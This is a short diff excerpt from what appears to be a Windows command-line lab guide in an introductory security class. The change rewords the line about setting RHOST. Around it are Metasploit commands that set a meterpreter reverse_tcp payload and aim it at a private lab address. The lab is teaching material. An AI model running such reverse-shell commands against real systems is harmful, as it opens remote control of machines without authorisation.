strandjs/IntroLabs/IntroClassFiles/Tools/IntroClass/WindowsCLI/WindowsCLI.md

 <pre>set PAYLOAD windows/meterpreter/reverse_tcp</pre>

-We also need to set the **RHOST IP** by using the following command:
+We also need to set the **RHOST IP** for the Windows system by using the following command:

 <pre>set RHOST 10.10.1.209</pre>